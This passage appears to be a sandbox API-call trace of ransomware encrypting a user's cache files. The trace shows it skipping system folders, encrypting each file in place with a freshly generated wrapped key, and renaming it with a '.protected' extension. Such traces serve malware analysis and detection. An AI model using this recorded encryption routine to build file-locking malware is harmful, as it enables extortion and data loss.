lpOverlapped=0x0) returned 1 [0087.531] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.531] CloseHandle (hObject=0x150) returned 1 [0087.531] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.protected") returned 161 [0087.531] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875.protected")) returned 1 [0087.532] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.532] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="Windows") returned -1 [0087.532] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="Program Files") returned -1 [0087.532] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="Program Files (x86)") returned -1 [0087.532] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="$Recycle.bin") returned 1 [0087.532] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="System Volume Information") returned -1 [0087.532] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 151 [0087.532] StrStrIW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".protected") returned 0x0 [0087.532] lstrcmpW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="RESTORE_FILES.txt") returned -1 [0087.532] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.532] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.533] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 151 [0087.533] StrStrW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".txt") returned 0x0 [0087.533] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 151 [0087.533] StrStrW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".rar") returned 0x0 [0087.533] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 151 [0087.533] StrStrW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".zip") returned 0x0 [0087.533] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d8, lpOverlapped=0x0) returned 1 [0087.534] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.534] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d8, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d8, lpOverlapped=0x0) returned 1 [0087.534] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.534] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.534] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.534] CloseHandle (hObject=0x150) returned 1 [0087.535] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.protected") returned 161 [0087.535] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973.protected")) returned 1 [0087.535] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.535] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="Windows") returned -1 [0087.535] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="Program Files") returned -1 [0087.535] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="Program Files (x86)") returned -1 [0087.535] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="$Recycle.bin") returned 1 [0087.535] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="System Volume Information") returned -1 [0087.535] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 118 [0087.535] StrStrIW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".protected") returned 0x0 [0087.535] lstrcmpW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="RESTORE_FILES.txt") returned -1 [0087.535] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.535] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 118 [0087.628] StrStrW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".txt") returned 0x0 [0087.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 118 [0087.628] StrStrW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".rar") returned 0x0 [0087.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 118 [0087.628] StrStrW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".zip") returned 0x0 [0087.628] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xf1d, lpOverlapped=0x0) returned 1 [0087.718] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff0e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.718] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xf1d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xf1d, lpOverlapped=0x0) returned 1 [0087.718] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.718] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.718] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.718] CloseHandle (hObject=0x150) returned 1 [0087.718] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406.protected") returned 128 [0087.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406.protected")) returned 1 [0087.719] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.719] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="Windows") returned -1 [0087.719] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="Program Files") returned -1 [0087.719] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="Program Files (x86)") returned -1 [0087.719] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="$Recycle.bin") returned 1 [0087.719] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="System Volume Information") returned -1 [0087.719] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned 118 [0087.719] StrStrIW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".protected") returned 0x0 [0087.719] lstrcmpW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="RESTORE_FILES.txt") returned -1 [0087.719] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.719] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.720] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned 118 [0087.720] StrStrW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".txt") returned 0x0 [0087.720] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned 118 [0087.720] StrStrW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".rar") returned 0x0 [0087.720] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned 118 [0087.720] StrStrW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".zip") returned 0x0 [0087.720] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x145, lpOverlapped=0x0) returned 1 [0087.721] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffebb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.721] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x145, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x145, lpOverlapped=0x0) returned 1 [0087.721] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.721] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.721] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.721] CloseHandle (hObject=0x150) returned 1 [0087.722] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D.protected") returned 128 [0087.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d.protected")) returned 1 [0087.722] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.722] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="Windows") returned -1 [0087.722] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="Program Files") returned -1 [0087.722] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="Program Files (x86)") returned -1 [0087.725] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="$Recycle.bin") returned 1 [0087.725] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="System Volume Information") returned -1 [0087.725] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned 118 [0087.725] StrStrIW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".protected") returned 0x0 [0087.725] lstrcmpW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="RESTORE_FILES.txt") returned -1 [0087.725] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.725] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.726] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned 118 [0087.726] StrStrW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".txt") returned 0x0 [0087.726] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned 118 [0087.726] StrStrW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".rar") returned 0x0 [0087.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned 118 [0087.729] StrStrW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".zip") returned 0x0 [0087.729] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x209, lpOverlapped=0x0) returned 1 [0087.730] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffdf7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.730] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x209, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x209, lpOverlapped=0x0) returned 1 [0087.730] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.730] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.730] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.730] CloseHandle (hObject=0x150) returned 1 [0087.730] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D.protected") returned 128 [0087.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d.protected")) returned 1 [0087.731] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.731] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="Windows") returned -1 [0087.731] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="Program Files") returned -1 [0087.731] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="Program Files (x86)") returned -1 [0087.731] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="$Recycle.bin") returned 1 [0087.732] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="System Volume Information") returned -1 [0087.732] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 151 [0087.732] StrStrIW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".protected") returned 0x0 [0087.732] lstrcmpW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="RESTORE_FILES.txt") returned -1 [0087.732] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.732] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.732] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 